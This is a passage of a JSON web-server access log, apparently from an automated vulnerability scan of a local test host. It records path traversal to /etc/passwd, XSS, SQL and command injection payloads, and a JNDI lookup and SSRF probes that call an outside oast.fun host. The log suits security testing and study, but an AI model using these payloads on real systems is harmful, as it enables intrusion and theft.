/ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redoc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wabam/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"vfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin.php?page=vfb-export HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/wp-admin/admin.php?page=vfb-export", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"\x0D\x0A pingback.ping\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A http://ca2u0eosmpv1jhs80ca0fxx6zi9ietttk.oast.fun\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A http://127.0.0.1/?p=1\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlrpc.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pods HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graph_cms HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/24 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/1-flash-gallery/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib/upgrade.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openapi.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.005","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cdn-cgi/image/width/https://ca2u0eosmpv1jhs80ca095fgy1o1sadfb.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(29N5mA3m79SrWnfs2izJnzlCHN0)) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"op=login&username=;`cat /etc/passwd`&password=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"127.0.0.1/module/login/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"option_key=a&perpose=update&callback=phpinfo","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"{\x22username\x22:\x22${jndi:ldap://${hostName}.ca2u0eosmpv1jhs80ca04eqn19rb4c5tg.oast.fun}\x22,\x22password\x22:\x22admin\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /suite-api/api/auth/token/acquire HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1/ui/", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apisix/admin/migrate/export HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/wp-content/plugins/1-flash-gallery/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/25 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /AirWatch/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"mail_address=%3Bcat${IFS}/etc/passwd%3B&button=%83%81%81%5B%83%8B%91%97%90M","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /conf_mail.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?c=../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/auth/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/contentfinder/connector/suggestions.json;%0aOJh.css?query_term=path%3a/&pre=29N5mCBidmOILY0eGA6pGJadijZ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Trace.axd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/updraftplus/includes/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /topic/e'%22%3E%3Cimg%20src=x%20onerror=alert(2)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/26 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/robomongo.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?redirect=..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"yuzo_related_post_css_and_style=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graph HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?rest_route=/whm/v3/themesettings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E 